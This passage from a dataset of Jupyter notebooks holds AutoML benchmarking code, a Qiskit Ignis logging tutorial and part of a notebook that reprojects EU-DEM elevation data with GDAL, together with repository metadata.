fitted_model.predict(data).as_data_frame(header=False)[\"predict\"].values.astype(int)\n return np.round(np.mean(pred == labels), 3)\n\n def get_best_pipeline(self, fitted_model):\n leader_params = fitted_model.leader.get_params()\n best_pipeline = [leader_params[\"model_id\"][\"actual_value\"][\"name\"]]\n if \"base_models\" in leader_params:\n for base_model in leader_params[\"base_models\"][\"actual_value\"]:\n best_pipeline.append(base_model[\"name\"])\n print(best_pipeline)\n h2o.cluster().shutdown()\n return best_pipeline\n\nclass AutoKerasModel(AbstractModel):\n\n def __init__(self):\n super().__init__()\n import tensorflow as tf\n tf.set_random_seed(self.seed)\n import torch\n torch.multiprocessing.set_sharing_strategy(\"file_system\")\n torch.manual_seed(self.seed)\n\n def get_fitted_model(self, x_train, y_train, params):\n s = np.sqrt(x_train.shape[1]).astype(int)\n x_train = x_train.reshape((len(x_train), s, s, 1))\n clf = ak.ImageClassifier(augment=True, path=generate_tmpdir(), verbose=False)\n clf.fit(x_train, y_train, time_limit=60*self.time_limit_mins)\n return clf\n\n def get_accuracy(self, x, y, clf, params):\n s = np.sqrt(x.shape[1]).astype(int)\n x = x.reshape((len(x), s, s, 1))\n y_pred = clf.predict(x)\n return np.round(accuracy_score(y_true=y, y_pred=y_pred), 3)\n\n def get_best_pipeline(self, clf):\n return [m for i, m in enumerate(clf.cnn.best_model.produce_model().modules()) if i > 0]",
"_____no_output_____"
],
[
"def get_model_params_dict_list(train_labels, test_labels):\n model_params_base = {\"train_labels\": train_labels, \"test_labels\": test_labels}\n return [\n {\n \"model\": TPOTClassifierModel,\n \"params_list\": [{**model_params_base}],\n \"use_clean_train_data\": False\n },\n # {\n # \"model\": TPOTClassifierModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": True\n # },\n # {\n # \"model\": H2OAutoMLModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": False\n # },\n # {\n # \"model\": H2OAutoMLModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": True\n # },\n # {\n # \"model\": AutoKerasModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": False\n # },\n # {\n # \"model\": AutoKerasModel,\n # \"params_list\": [{**model_params_base}],\n # \"use_clean_train_data\": True\n # },\n ]",
"_____no_output_____"
],
[
"def visualize(df):\n visualize_scores(\n df,\n score_names=[\"test_acc\", \"train_acc\"],\n is_higher_score_better=[True, True],\n err_param_name=\"max_angle\",\n # err_param_name=\"std\",\n title=\"Classification scores with added error\"\n )\n plt.show()",
"_____no_output_____"
],
[
"train_data, test_data, train_labels, test_labels = get_data()\n\ndf = runner.run(\n train_data=train_data,\n test_data=test_data,\n preproc=Preprocessor,\n preproc_params=None,\n err_root_node=get_err_root_node(),\n err_params_list=get_err_params_list(train_data),\n model_params_dict_list=get_model_params_dict_list(train_labels, test_labels),\n n_processes=1\n)",
"_____no_output_____"
],
[
"print_results_by_model(df,\n [\"train_labels\", \"test_labels\"],\n # [\"mean\", \"min_val\", \"max_val\", \"train_labels\", \"test_labels\"], \n err_param_name=\"max_angle\",\n # err_param_name=\"std\",\n pipeline_name=\"best_pipeline\"\n)\nvisualize(df)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706973402bf81546ef7cefe95ff2c28fdfc18df | 19,995 | ipynb | Jupyter Notebook | qiskit/advanced/ignis/9_ignis_logging.ipynb | jessicapointing/qiskit-iqx-tutorials | b9b2a65f9c674728ef81fab36bcd871ad20e436b | [
"Apache-2.0"
] | 2 | 2019-12-09T08:24:21.000Z | 2019-12-12T08:00:03.000Z | qiskit/advanced/ignis/9_ignis_logging.ipynb | jessicapointing/qiskit-iqx-tutorials | b9b2a65f9c674728ef81fab36bcd871ad20e436b | [
"Apache-2.0"
] | null | null | null | qiskit/advanced/ignis/9_ignis_logging.ipynb | jessicapointing/qiskit-iqx-tutorials | b9b2a65f9c674728ef81fab36bcd871ad20e436b | [
"Apache-2.0"
] | null | null | null | 41.057495 | 646 | 0.553388 | [
[
[
"<img src=\"../../../images/qiskit_header.png\" alt=\"Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook\" align=\"middle\">",
"_____no_output_____"
],
[
"# Ignis Logging\n---\n\n* **Last Updated:** August 4, 2019\n* **Requires:** qiskit-ignis 0.2\n\n# Introduction\n\nThis tutorial shows how to use logging in Ignis. The purpose of Ignis logging is twofold:\n1. Log run-time events and emit messages to the console.\n2. Log data of interest to a file. \n\nIgnis logging is based on [Python's logging package](https://docs.python.org/3/library/logging.html). There are 3 classes in the Ignis logging module: \n\n* **IgnisLogger** - Objects of this class are used for logging. The class is derived from the Logger class defined in the Python's logging package.\n* **IgnisLogging** - A singleton class responsible for configuring logging behavior in Ignis as well as for creating IgnisLogger objects.\n* **IgnisLogReader** - A class for reading file logs created by IgnisLogger objects, containing filtering capabilities support.\n\n\n## Using IgnisLogger\n\nIn this section we will see how to log data to console and files using `IgnisLogger` objects.\n\n### Creating a logger object\nConsole and file logging in Ignis is performed using an object of the class `IgnisLogger`. Such an object is essentially a `Logger` object of the [Python's logging package](https://docs.python.org/3/library/logging.html), extended with a convenient file logging capability. \n\nLet's create such an object:",
"_____no_output_____"
]
],
[
[
"from qiskit.ignis.logging import ignis_logging\n\nlogger = ignis_logging.IgnisLogging().get_logger(__name__)",
"_____no_output_____"
]
],
[
[
"You can see here the use of the `IgnisLogging` singleton class for getting an `IgnisLogger` object. The parameter for the `get_logger` method gives the logger its name. This name is used when messages are printed to the console, to identify the source file which the log was printed from. ",
"_____no_output_____"
],
[
"### Logging to console\n\nLogging to console using an `IgnisLogger` object is identical to using [Python's logging package](https://docs.python.org/3/library/logging.html). For convenience, here are some examples:\n\n",
"_____no_output_____"
]
],
[
[
"logger.info(\"An info message\") # wont show by default\nlogger.warning(\"This is a warning\")\nlogger.error(\"An error message\")\nlogger.critical(\"Critical error\")\n",
"WARNING: __main__ - This is a warning\nERROR: __main__ - An error message\nCRITICAL: __main__ - Critical error\n"
]
],
[
[
"#### Configuring console logging\nEssentially, console logging in Ignis is identical to python logging. For the most part, the important aspect to consider when using Python logging is message levels. There are 5 pre-defined message levels in Python logging, as listed below, in ascending order of severity:\n\nDEBUG <br>\nINFO <br>\nWARNING <br>\nERROR <br>\nCRITICAL <br>\n\nThe default message level in Python logging is WARNING, meaning all messages of WARNING severity or higher will be logged to the console. This is why the INFO message in the example above was not printed. You can set the severity level using the following code:\n\n",
"_____no_output_____"
]
],
[
[
"import logging\nlogger.setLevel(logging.INFO)\nlogger.info(\"This will be printed now\")",
"INFO: __main__ - This will be printed now\n"
]
],
[
[
"For complete documentation on Python logging, see [here](https://docs.python.org/3/library/logging.html).\n\n### Logging to file\n\nLogging to file is carried out by using the `log_to_file` method of the `IgnisLogger` class. The method expects key-value pairs given as Python keyword parameters. Any number of key-value pairs can be given to the method. Each call to the `log_to_file` method results in a new line being appended and stored in the log file. Each line contains a timestamp, an identifying name and list of key-value pairs. Here are a few examples:",
"_____no_output_____"
]
],
[
[
"logger.log_to_file(t1=0.1, t2='0.3')\nlogger.log_to_file(qubits=[0,1,3], fidelity=.9998)\nlogger.log_to_file(dictionary={'a':1, 'b':2})",
"_____no_output_____"
]
],
[
[
"And this is how these are logged in the log file:\n\n``\n2019/06/02 11:36:28 ignis_logging 't1':'0.1' 't2':'0.3' \n2019/06/02 11:36:28 ignis_logging 'qubits':'[0, 1, 3]' 'fidelity':'0.9998' \n2019/06/02 11:36:28 ignis_logging 'dictionary':'{'a': 1, 'b': 2}\n``\n\nNotice how the data is stored:\nEach key-value pair is separated by a colon (:), the pairs are separated by space and all keys and values are put in single quotes ('). This makes it easy to import the data into a CSV or other regular data formats. \n\n### Configuring the IgnisLogger\n\nBesides creating `IgnisLogger` objects, the `IgnisLogger` class is used to configure the file logging aspects in Ignis. The main aspects controlled by the `IgnisLogger` class are:\n\n* Enabling/disabling file logging.\n* Location of the log files.\n* Miscellaneous log file controls. \n\nThe main vehicle for configuring Ignis logging is a configuration file, named *logging.yaml*, whose full path is expected by `IgnisLogger` to be:\n\n``\n<USER HOME DIR>/.qiskit/logging.yaml\n``\n\nAn example configuration file is located in the logging directory of Ignis. You can use this file as a starting point. \n\nThe main settings in the configuration file are as follow:\n\n```yaml\nfile_logging: true\t\t# Enables/disables file logging (true/false)\nlog_file: ignis_test_log.log\t# Name of the file log\nmax_size: 1000000\t\t# Max file size (in bytes). \nmax_rotations: 5\t\t# Max number of file rotations\n```\n\nThe max_size and max_rotations settings are used in conjunction with each other to limit the amount of disk space used for logging. Up to max_rotations files will be stored on disk, each of which is limited to max_size bytes in size, such that the most recent max_size * max_rotations bytes are stored in one or more log files. Rotated file names' are automatically suffixed with numbers. \n\nFile logging can be enabled or disabled either by using the logging configuration file or by calling the `enable_file_logging` or `disable_file_logging` methods of `IgnisLogger`, respectively. \n\nNote: File logging is disabled by default if no logging configuration file is provided. Enabling file logging without using a configuration file (i.e. programatically) results in `IgnisLogging` using its internal file logging default settings.\n\n\n\n## IgnisLogReader\n\nThe Ignis logging module comes with a log reader class called `IgnisLogReader`. The purpose of `IgnisLogReader` is to retrieve log data from Ignis log files in such a way that it can be further processed and analyzed. In essence, `IgnisLogReader` returns a list of lists, each of which contains a list of key-value pairs. \n\nNote: since any data can be stored using `IgnisLogger`'s `log_to_file` method, it is up to the user to correctly interpret the logged data when using the `IgnisLogReader` class. \n\n### Reading log data\nThe most basic usage of the `IgnisLogReader` is to retrieve all the data stored in the log file (or multiple files, in case of file rotations). Here is how this can be achieved: ",
"_____no_output_____"
]
],
[
[
"log_reader = ignis_logging.IgnisLogReader()\nrows = log_reader.read_values()\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:32:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:32:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:32:35', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:32:35', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:34:54', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:34:54', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:35:03', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:35:03', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '11:36:28', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:28', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:28', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '13:21:57', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '13:21:57', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '13:21:57', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:24', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:24', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:24', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:53', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:53', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:53', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:14:56', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:14:56', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:14:56', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n"
]
],
[
[
"Note how the data is retrieved as a list of lists. In addition, when a logging configuration file is used, `IgnisLogReader` will automatically read the log files as defined in the configuration file. You can specify a custom log file to read from using the log_file parameter of the `read_values` method.\n\n#### Filtering by date and time\n`IgnisLogReader` supports date/time based filtering. You can specify a to and a from date/time, as well as a from-to range by combining both to and from datetime specifications. Here are a couple example:",
"_____no_output_____"
]
],
[
[
"rows = log_reader.read_values(from_datetime=\"2019/06/02 11:36:25\")\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:36:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '11:36:28', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:28', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:28', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '13:21:57', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '13:21:57', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '13:21:57', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:24', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:24', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:24', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n['2019/06/02', '14:12:53', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '14:12:53', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '14:12:53', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n"
],
[
"from datetime import datetime\nto_dt = datetime.strptime(\"02/06/19 11:36:25\", \"%d/%m/%y %H:%M:%S\")\nrows = log_reader.read_values(from_datetime=\"2019/06/02 11:36:25\", to_datetime=to_dt)\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:36:25', \"'t1':'0.1'\", \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'qubits':'[0,\", '1,', \"3]'\", \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'dictionary':'{'a':\", '1,', \"'b':\", \"2}'\"]\n"
]
],
[
[
"Note how the date/time parameters can handle both date/time strings as well as datetime objects. \n#### Filtering by key names\nYou can also ask `IgnisLogReader` to retrieve only key-values pairs of specific keys. Use the _keys_ parameter of the `read_values` method to achieve that. For example: ",
"_____no_output_____"
]
],
[
[
"rows = log_reader.read_values(keys=\"t1\")\nprint(*rows, sep=\"\\n\")\n",
"['2019/06/02', '11:32:25', \"'t1':'0.1'\"]\n['2019/06/02', '11:32:35', \"'t1':'0.1'\"]\n['2019/06/02', '11:34:54', \"'t1':'0.1'\"]\n['2019/06/02', '11:35:03', \"'t1':'0.1'\"]\n['2019/06/02', '11:36:25', \"'t1':'0.1'\"]\n['2019/06/02', '11:36:28', \"'t1':'0.1'\"]\n['2019/06/02', '13:21:57', \"'t1':'0.1'\"]\n['2019/06/02', '14:12:24', \"'t1':'0.1'\"]\n['2019/06/02', '14:12:53', \"'t1':'0.1'\"]\n"
],
[
"rows = log_reader.read_values(keys=[\"t2\", \"fidelity\"], to_datetime=to_dt)\nprint(*rows, sep=\"\\n\")",
"['2019/06/02', '11:32:25', \"'t2':'0.3'\"]\n['2019/06/02', '11:32:25', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:32:35', \"'t2':'0.3'\"]\n['2019/06/02', '11:32:35', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:34:54', \"'t2':'0.3'\"]\n['2019/06/02', '11:34:54', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:35:03', \"'t2':'0.3'\"]\n['2019/06/02', '11:35:03', \"'fidelity':'0.9998'\"]\n['2019/06/02', '11:36:25', \"'t2':'0.3'\"]\n['2019/06/02', '11:36:25', \"'fidelity':'0.9998'\"]\n"
]
],
[
[
"Once retrieved you can convert the data into a csv object, pandas or any other format for further processing and visualization. ",
"_____no_output_____"
]
],
[
[
"import qiskit.tools.jupyter\n%qiskit_version_table\n%qiskit_copyright",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706974337b281441e1c0b477ef59555dbe670cd | 30,344 | ipynb | Jupyter Notebook | run_DEM_EUDEMv11_ipy.ipynb | HeZhang1994/DEM-Digital-Elevation-Model-Python-Tool | c6fc811d17143faf3473f2b7cbcaebb9819b7a53 | [
"MIT"
] | 73 | 2019-02-24T06:43:12.000Z | 2022-03-16T03:51:33.000Z | run_DEM_EUDEMv11_ipy.ipynb | HeZhang1994/DEM-Digital-Elevation-Model-Tools | c6fc811d17143faf3473f2b7cbcaebb9819b7a53 | [
"MIT"
] | 1 | 2019-02-19T09:35:03.000Z | 2019-02-19T09:35:03.000Z | run_DEM_EUDEMv11_ipy.ipynb | HeZhang1994/DEM-Digital-Elevation-Model-Tools | c6fc811d17143faf3473f2b7cbcaebb9819b7a53 | [
"MIT"
] | 23 | 2019-03-28T01:03:55.000Z | 2022-03-26T06:45:12.000Z | 41.681319 | 551 | 0.516379 | [
[
[
"'''Python for Processing Digital Elevation Models (DEMs).\n\nAuthor: He Zhang @ University of Exeter\nDate: 16th March 2019 (Update: 20th April 2019)\nContact: [email protected] [email protected]\n\nCopyright (c) 2019 He Zhang\n'''\n\n'''\nDEM Data:\n EUDEMv11 - EU-DEMv1.1\n Download Link: https://land.copernicus.eu/imagery-in-situ/eu-dem/eu-dem-v1.1\n\nTerms and Abbreviations:\n EPSG - European Petroleum Survey Group\n GCS - Geographic Coordinate System (Identified by an unique EPSG code)\n PCS - Projected Coordinate System (Identified by an unique EPSG code)\n WGS-84 [EPSG 4326] - 1984 World Geodetic System [GCS]\n Merc [EPSG 3857] - Mercator -> Web Mercator -> Pseudo Mercator [PCS of WGS-84]\n OSGB-36 [EPSG 4277] - 1936 Ordnance Survey Great Britain [GCS]\n BNG [EPSG 27700] - British National Grid [PCS of OSGB-36]\n ETRS-89 [EPSG 4258] - 1989 European Terrestrial Reference System [GCS]\n LAEA [EPSG 3035] - Lambert Azimuthal Equal-Area [PCS of ETRS-89]\n lat - Latitude\n lng - Longitude\n Transform - GCS to GCS\n Project - GCS to PCS, PCS to PCS\n Convert - PCS to PCS\n\nFunctions:\n Convert DEM from LAEA PCS to ETRS-89 GCS.\n\n Transform DEM from ETRS-89 GCS to WGS-84 GCS.\n Transform DEM from ETRS-89 GCS to OSGB-36 GCS.\n\n Get the elevation from DEM in WGS-84 GCS.\n Get the elevation from DEM in OSGB-36 GCS.\n Get the elevation from DEM in ETRS-89 GCS.\n\n******************** Important Information of Code Usage ********************\n- Use 'GDAL.GetProjection()' to check the GCS/PCS information of DEM (in TIF format).\n- Use 'GDAL.GetGeoTransform()' to check the resolution of DEMs.\n- Use 'GDAL.GetGeoTransform()' to check (lat, lng) of top-left corner of DEM (in GCS).\n- The (lat, lng) of other locations in DEM can therefore be calculated.\n- Each GCS has one related PCS (GCS/PCS is identified by an unique EPSG code).\n- You can transform DEM between different GCSs (e.g., WGS-84 <-> OSGB-36 <-> ETRS-89).\n- You can project DEM in GCS to the related PCS and then display its 2D image.\n- You can not display DEM in GCS as 2D image (e.g., WGS-84 -> 2D image is wrong).\n- You can not project DEM in GCS to the unrelated PCS (e.g., WGS-84 -> BNG is wrong).\n- You can not project DEM between different PCSs (e.g., Pseudo Mercator <-> BNG is wrong).\n* Use 'gdalwarp' command to transform/project DEM to different GCSs/PCSs might be correct.\n'''\n\n# Python 3.7\n\n# import os\n# import re\n# import shutil\n# import subprocess\n\n# import matplotlib.pyplot as plt\nimport numpy as np\nfrom osgeo import gdal\nfrom pandas import read_csv\n\nfrom pyDEM_function import get_dem_info\nfrom pyDEM_function import get_elevation\n# from pyDEM_function import get_file_names\n# from pyDEM_function import show_2d_dem\nfrom pyDEM_function import transprojcnvt_dem\n# from pyDEM_function import write_dem\n\n",
"_____no_output_____"
],
[
"# Specify user settings.\n\n# Set the EPSG code.\nEPSG_WGS84 = 4326\nEPSG_OSGB36 = 4277\nEPSG_ETRS89 = 4258\nEPSG_LAEA = 3035\n\n# Set the format of DEMs.\nDEM_FORMAT = '.tif'\n\n# Set the path of DEMs.\nPATH_EUDEM = 'DATA/DATA_EUDEMv11/'\n# PATH_EUDEM_SOURCE = 'DATA/DATA_EUDEMv11/EPSG3035_s/' # The folder of source DEMs must exist.\n\n# Set the name of DEMs in GCSs.\nEUDEM_GCS_WD = 'EUDEMv11_EPSG4326.tif'\nEUDEM_GCS_UK = 'EUDEMv11_EPSG4277.tif'\nEUDEM_GCS_EU = 'EUDEMv11_EPSG4258.tif'\n\n# Set the name of DEMs in PCSs.\nEUDEM_PCS_WD = 'EUDEMv11_EPSG3857.tif'\nEUDEM_PCS_UK = 'EUDEMv11_EPSG27700.tif'\nEUDEM_PCS_EU = 'EUDEMv11_EPSG3035.tif'\n\n# Set the path of location data file.\nPATH_LD_STATION_DATA = 'DATA/DATA_LD_AirQuality/London_AirQuality_Stations.csv'\n",
"_____no_output_____"
],
[
"# <EUDEMv11> Convert DEM from LAEA PCS to ETRS-89 GCS.\n\nprint('\\n>>> <EUDEMv11> Convert DEM from LAEA PCS to ETRS-89 GCS.')\n\npath = PATH_EUDEM\ndem_in = path + EUDEM_PCS_EU\ndem_out = path + EUDEM_GCS_EU\n\nepsg_in = EPSG_LAEA\nepsg_out = EPSG_ETRS89\n\ntransprojcnvt_dem(dem_in, epsg_in, dem_out, epsg_out)\n\ndata = gdal.Open(dem_in)\nget_dem_info(data, if_print=True)\ndata = gdal.Open(dem_out)\nget_dem_info(data, if_print=True)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Convert DEM from LAEA PCS to ETRS-89 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 40000\nThe number of column (width) is: 40000\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (3000000.0, 25.0, 0.0, 4000000.0, 0.0, -25.0)\nThe GCS/PCS information is:\n PROJCS[\"ETRS89_ETRS_LAEA\",GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]],PROJECTION[\"Lambert_Azimuthal_Equal_Area\"],PARAMETER[\"latitude_of_center\",52],PARAMETER[\"longitude_of_center\",10],PARAMETER[\"false_easting\",4321000],PARAMETER[\"false_northing\",3210000],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]]]\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Transform DEM from ETRS-89 GCS to WGS-84 GCS.\n\nprint('\\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to WGS-84 GCS.')\n\npath = PATH_EUDEM\ndem_in = path + EUDEM_GCS_EU\ndem_out = path + EUDEM_GCS_WD\n\nepsg_in = EPSG_ETRS89\nepsg_out = EPSG_WGS84\n\ntransprojcnvt_dem(dem_in, epsg_in, dem_out, epsg_out)\n\ndata = gdal.Open(dem_in)\nget_dem_info(data, if_print=True)\ndata = gdal.Open(dem_out)\nget_dem_info(data, if_print=True)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to WGS-84 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"WGS 84\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563,AUTHORITY[\"EPSG\",\"7030\"]],AUTHORITY[\"EPSG\",\"6326\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4326\"]]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Transform DEM from ETRS-89 GCS to OSGB-36 GCS.\n\nprint('\\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to OSGB-36 GCS.')\n\npath = PATH_EUDEM\ndem_in = path + EUDEM_GCS_EU\ndem_out = path + EUDEM_GCS_UK\n\nepsg_in = EPSG_ETRS89\nepsg_out = EPSG_OSGB36\n\ntransprojcnvt_dem(dem_in, epsg_in, dem_out, epsg_out)\n\ndata = gdal.Open(dem_in)\nget_dem_info(data, if_print=True)\ndata = gdal.Open(dem_out)\nget_dem_info(data, if_print=True)\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Transform DEM from ETRS-89 GCS to OSGB-36 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\nThe information of DEM:\nThe number of row (height) is: 30506\nThe number of column (width) is: 52430\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266102928602475, 0.0003392475335051166, 0.0, 58.98812292836723, 0.0, -0.0003392475335051166)\nThe GCS/PCS information is:\n GEOGCS[\"OSGB 1936\",DATUM[\"OSGB_1936\",SPHEROID[\"Airy 1830\",6377563.396,299.3249646000044,AUTHORITY[\"EPSG\",\"7001\"]],TOWGS84[446.448,-125.157,542.06,0.15,0.247,0.842,-20.489],AUTHORITY[\"EPSG\",\"6277\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4277\"]]\n\n>>> Complete!\n\n"
],
[
"# Read London air quality monitoring station data file.\n\nprint('\\n>>> Read London air quality monitoring station data file.')\n\nsite_data = read_csv(PATH_LD_STATION_DATA)\nprint(site_data.head(3))\n\nsite_num = site_data['SiteName'].count()\nprint('\\n*==> The number of stations is: %d' % site_num)\n\n# Get the latitude and longitude of stations.\nsite_latlng = np.zeros((site_num, 2))\nsite_latlng[:, 0] = site_data['Latitude'] # The 0-th column - Latitude.\nsite_latlng[:, 1] = site_data['Longitude'] # The 1-th column - Longitude.\n\nnp.set_printoptions(suppress=True) # Print numbers without scientific notation.\nprint('\\n*==> The location (lat, lng) of stations are:\\n', site_latlng)\n\nprint('\\n>>> Complete!\\n')\n",
